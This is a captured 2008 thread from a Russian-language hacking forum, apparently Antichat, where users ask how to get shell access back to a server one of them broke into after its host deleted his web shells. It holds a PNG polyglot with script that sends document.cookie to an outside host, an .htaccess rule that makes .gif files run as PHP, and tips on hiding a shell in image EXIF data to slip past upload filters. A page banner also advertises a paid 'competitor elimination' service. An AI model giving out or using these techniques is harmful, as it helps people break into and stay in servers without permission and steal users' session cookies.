Ваши вопросы по уязвимостям.

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 124 из 2422

124

Опции темы

Поиск в этой теме

Опции просмотра

проблемы с доступом к серверу

17.03.2008, 22:13

prozorov

Познающий

Регистрация: 19.01.2007

Сообщений: 53

С нами: 10162289

Репутация: 6

проблемы с доступом к серверу

в общем, описываю ситуацию с самого начала.

был доступ к серву посредсвам шела, потом поимел доступ к бд итд
когда холдер заметил мое появление удалил все шелы.
залил заново, но теперь шел не запускается (пробовал разные).
видимо чтото с обработкой пхп. При запросе к пхп файлам вылазит пустая страница(в сорсах- хтмл=боди-боди-хтмл)
остался доступ к админке- заливаю без проблем, но редактить нельзя.
с БД тоже самое- просто вылазит пустая страница (с других ипов не пускает, сам прописывал свой ип в конфигах)
к записи в админке разрешены следующие форматы
txt, php, gif, jpg, xls, mdb, csv, rar, zip, css, doc, chm, pdf

Что сейчас можно сделать чтобы снова доступ получить? И что вообще холдер сделал?

𝕏 Twitter Reddit Telegram Копировать ссылку

Последний раз редактировалось prozorov; 17.03.2008 в 22:25..

17.03.2008, 22:56

n0ne

Постоянный

Регистрация: 01.01.2007

Сообщений: 796

С нами: 10188506

Репутация: 861

prozorov, Залей какой-нить скрипт для работы с бд на пхп и проверь работает ли, и просто <? echo 'henk'; ?>, и напиши результаты.

17.03.2008, 23:19

prozorov

Познающий

Регистрация: 19.01.2007

Сообщений: 53

С нами: 10162289

Репутация: 6

Цитата:

Сообщение от n0ne

подходящих скриптов не нашел, но вроде обрабатывает
<? echo 'henk'; ?> тоже обрабатывает

хтакцес с php_flag engine off

может быть, я проверил все папки- результат один

кста, на сайте форум был, тоже работать перестал

18.03.2008, 00:53

MSDEN

Новичок

Регистрация: 07.05.2007

Сообщений: 12

С нами: 10006438

Репутация: 1

нашел xss на сайте залив картинку png c таким содержанием

Код:

‰PNG         IHDR         Д‰   sRGB ®Ой   gAMA  ±Џьa    cHRM  z&  Ђ„  ъ   Ђи  u0  к`  :˜  pњєQ<   	pHYs     љњ   IDATWcш 	ыэ+ХE    IEND®B`‚<html>  <script>alert(/by_blabla_/)</script><script>img = new Image();  img.src = "http://s.netsec.ru/absent09.gif?"+document.cookie;</script>  </html> z&  Ђ„  ъ   Ђи  u0  к`  :˜  pњєQ<   	pHYs     љњ   IDATWcш 	ыэ+ХE    IEND®B`‚

напрашивается вопрос можно ли вставить шелл вместо <html> <script>alert(/by_blabal_/)</script><script>img = new Image(); img.src = "http://s.netsec.ru/absent09.gif?"+document.cookie;</script> </html> ?

я вставляю вместо этого код шелла а когда запускаю такое чувство будто php не работает =(

18.03.2008, 01:14

gibson

Постоянный

Регистрация: 24.02.2006

Сообщений: 447

С нами: 10636106

Репутация: 705

Цитата:

Сообщение от prozorov

prozorov у тя safe mode on скорее всего с safe_mode_gid(on)

to MSDEN

по пробуй залить это

PHP код:


		
			
<Files "s.gif">

AddType application/x-httpd-php .gif

</Files>



и залить картинку с шеллом.

17.03.2008, 23:08

blackybr

♠ ♦ ♣ ♥

Регистрация: 18.05.2006

Сообщений: 1,828

С нами: 10516826

Репутация: 3742

Отправить сообщение для blackybr с помощью AIM

Отправить сообщение для blackybr с помощью Yahoo

к примеру мог в папку куда все льется положить хтакцес с php_flag engine off

__________________

Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2

18.03.2008, 01:01

blackybr

♠ ♦ ♣ ♥

Регистрация: 18.05.2006

Сообщений: 1,828

С нами: 10516826

Репутация: 3742

нет, xss выполняется на стороне клиента. пхп код который ты вставляешь тоже только показывается юзеру, но не выполняется на самом сервере

__________________

Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2

18.03.2008, 01:20

MSDEN

Новичок

Регистрация: 07.05.2007

Сообщений: 12

С нами: 10006438

Репутация: 1

gibson, я в этом чуть чуть чайнег
<Files "s.gif">
AddType application/x-httpd-php .gif
</Files> залить в виде чего? как второй файл чтоли?
а какртинку с шеллом как залить? просто у шелла разрешение поменять?
если нетрудно дай аську

18.03.2008, 02:20

o3,14um

Участник форума

Регистрация: 16.11.2006

Сообщений: 230

С нами: 10254549

Репутация: 227

Цитата:

<Files "s.gif">
AddType application/x-httpd-php .gif
</Files>

это текст в файле .htaccess (тип настройка в апаче). Этот файл говорит апачу, чтобы расшширение ГИФ он воспринимал как скрипт.

Как залить? ЕСли у тя там проверка тока по расширению, то поменяй просто расширение. а если по типу, то допиши шелл в конец картинки. (ну например в свойствах в поле exif впиши)

#10

18.03.2008, 02:43

n0ne

Постоянный

Регистрация: 01.01.2007

Сообщений: 796

С нами: 10188506

Репутация: 861

prozorov, в каком плане обрабатываеца? Работает или нет? я про echo.

Страница 124 из 2422

124

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules